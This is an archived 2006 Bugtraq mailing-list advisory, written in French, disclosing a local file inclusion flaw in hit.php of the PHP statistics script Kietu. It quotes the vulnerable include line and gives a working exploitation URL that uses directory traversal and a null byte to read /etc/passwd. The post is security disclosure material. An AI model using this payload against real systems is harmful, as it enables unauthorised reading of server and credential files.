Local File Inclusion : Kietu

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Local File Inclusion : Kietu
From: cdg393@xxxxxxxxx
Date: 23 Sep 2006 22:08:46 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

[::] Produit                 : Kietu

[::] Langage                 : PHP

[::] Description             : Kietu? est un script écrit en PHP, qui requiert 
une base de donnée mySQL, et qui vous permet de générer et consulter les 
statistiques d'accès à votre site web.

[::] Site web officiel       : http://www.Kietu.net/

[::] Page vulnérable         : hit.php

[::] Faille de sécurité      : Local File Inclusion

[::] Code vulnérable         : ( Ligne 2 ) -> include_once 
$url_hit.'class/kdetect.class.php';

[::] Exploitation            : 
http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00

@ [::] Crédit                  : Avis de sécurité par cdg393 -> 
cdg393_gmail_com :)

Prev by Date: Re: Woltlab Burning Board 2.3.X SQL Injection Vulnerability
Next by Date: Re: Woltlab Burning Board 2.3.X SQL Injection Vulnerability
Previous by thread: Re: [Full-disclosure] Yet another 0day for IE (Disabling Javascript no longer a fix)
Next by thread: [security bulletin] HPSBUX02152 SSRT5973 rev.1 - HP-UX Kerberos Client Remote Unauthenticated Execution of Arbitrary Code
Index(es):
- Date
- Thread